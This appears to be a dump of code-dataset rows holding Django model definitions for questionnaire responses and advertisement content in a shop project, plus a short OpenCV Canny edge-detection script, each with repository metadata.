question = models.ForeignKey(Question, on_delete=models.CASCADE)
class QuestionResponseSelection(models.Model):
response_detail_id = models.ForeignKey(QuestionResponseDetail, on_delete=models.CASCADE)
choice = models.ForeignKey(QuestionChoice, on_delete=models.CASCADE)
class QuestionResponseText(models.Model):
response_detail_id = models.ForeignKey(QuestionResponseDetail, on_delete=models.CASCADE)
text = models.TextField()
| true
| true
|
f7193789b5657ecbc5688792c3078421cbb68e5f
| 1,193
|
py
|
Python
|
meiduo_mall/meiduo_mall/apps/contents/models.py
|
0-pangda/meiduo_project1
|
69d771d9c5b67c01510ecfabe4c28989e44d0fba
|
[
"MIT"
] | null | null | null |
meiduo_mall/meiduo_mall/apps/contents/models.py
|
0-pangda/meiduo_project1
|
69d771d9c5b67c01510ecfabe4c28989e44d0fba
|
[
"MIT"
] | null | null | null |
meiduo_mall/meiduo_mall/apps/contents/models.py
|
0-pangda/meiduo_project1
|
69d771d9c5b67c01510ecfabe4c28989e44d0fba
|
[
"MIT"
] | null | null | null |
from django.db import models
from meiduo_mall.utils.models import BaseModel
# Create your models here.
class ContentCategory(BaseModel):
    """Advertisement content category (e.g. a homepage section key)."""
    name = models.CharField(max_length=50, verbose_name='名称')
    # `key` is the lookup identifier used to select categories by name.
    key = models.CharField(max_length=50, verbose_name='类别键名')

    class Meta:
        db_table = 'tb_content_category'
        verbose_name = '广告内容类别'
        verbose_name_plural = verbose_name

    def __str__(self):
        return self.name
class Content(BaseModel):
    """A single advertisement content item within a ContentCategory."""
    # PROTECT: a category cannot be deleted while content still references it.
    category = models.ForeignKey(ContentCategory, on_delete=models.PROTECT, verbose_name='类别')
    title = models.CharField(max_length=100, verbose_name='标题')
    url = models.CharField(max_length=300, verbose_name='内容链接')
    image = models.ImageField(null=True, blank=True, verbose_name='图片')
    text = models.TextField(null=True, blank=True, verbose_name='内容')
    # display order within the category
    sequence = models.IntegerField(verbose_name='排序')
    # whether this item is currently displayed
    status = models.BooleanField(default=True, verbose_name='是否展示')

    class Meta:
        db_table = 'tb_content'
        verbose_name = '广告内容'
        verbose_name_plural = verbose_name

    def __str__(self):
        return self.category.name + ': ' + self.title
| 32.243243
| 94
| 0.695725
|
from django.db import models
from meiduo_mall.utils.models import BaseModel
class ContentCategory(BaseModel):
name = models.CharField(max_length=50, verbose_name='名称')
key = models.CharField(max_length=50, verbose_name='类别键名')
class Meta:
db_table = 'tb_content_category'
verbose_name = '广告内容类别'
verbose_name_plural = verbose_name
def __str__(self):
return self.name
class Content(BaseModel):
category = models.ForeignKey(ContentCategory, on_delete=models.PROTECT, verbose_name='类别')
title = models.CharField(max_length=100, verbose_name='标题')
url = models.CharField(max_length=300, verbose_name='内容链接')
image = models.ImageField(null=True, blank=True, verbose_name='图片')
text = models.TextField(null=True, blank=True, verbose_name='内容')
sequence = models.IntegerField(verbose_name='排序')
status = models.BooleanField(default=True, verbose_name='是否展示')
class Meta:
db_table = 'tb_content'
verbose_name = '广告内容'
verbose_name_plural = verbose_name
def __str__(self):
return self.category.name + ': ' + self.title
| true
| true
|
f719378c3733c997ba58b7324d53b78e85a768f4
| 301
|
py
|
Python
|
opencv-python/ex6_image_canny.py
|
jemygraw/opencv-tutorial
|
2b85b5bf4b1e6ba416733a5b903752462101725e
|
[
"MIT"
] | null | null | null |
opencv-python/ex6_image_canny.py
|
jemygraw/opencv-tutorial
|
2b85b5bf4b1e6ba416733a5b903752462101725e
|
[
"MIT"
] | null | null | null |
opencv-python/ex6_image_canny.py
|
jemygraw/opencv-tutorial
|
2b85b5bf4b1e6ba416733a5b903752462101725e
|
[
"MIT"
] | 2
|
2019-06-03T16:07:03.000Z
|
2019-07-24T08:36:00.000Z
|
import cv2

fname = '/Users/jemy/Documents/github-avatar.png'

# Fix: cv2.CAP_MODE_GRAY is a VideoCapture constant (value 2, which imread
# interprets as IMREAD_ANYDEPTH, not grayscale). IMREAD_GRAYSCALE is the
# correct flag family for cv2.imread.
img = cv2.imread(fname, cv2.IMREAD_GRAYSCALE)
if img is None:
    # imread returns None (no exception) when the file is missing/unreadable.
    raise SystemExit('failed to load image: ' + fname)

cv2.namedWindow('Example6', cv2.WINDOW_AUTOSIZE)
cv2.imshow('Example6', img)

# Canny edge detection with hysteresis thresholds (0, 100).
imgOut = cv2.Canny(img, 0, 100)
cv2.imshow('Example6', imgOut)
cv2.waitKey(0)
cv2.destroyWindow('Example6')
| 20.066667
| 49
| 0.744186
|
import cv2
fname = '/Users/jemy/Documents/github-avatar.png'
img = cv2.imread(fname, cv2.CAP_MODE_GRAY)
cv2.namedWindow('Example6', cv2.WINDOW_AUTOSIZE)
cv2.imshow('Example6', img)
imgOut = cv2.Canny(img, 0, 100)
cv2.imshow('Example6', imgOut)
cv2.waitKey(0)
cv2.destroyWindow('Example6')
| true
| true
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.